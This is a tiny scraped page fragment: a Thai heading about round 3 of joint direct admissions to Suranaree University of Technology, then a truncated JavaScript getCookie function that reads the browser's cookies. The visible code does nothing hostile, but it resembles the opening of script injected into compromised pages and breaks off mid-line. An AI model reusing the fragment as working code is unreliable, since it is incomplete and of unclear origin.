รับตรงร่วมกันเทคโนโลยีสุรนารี รอบที่ 3

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…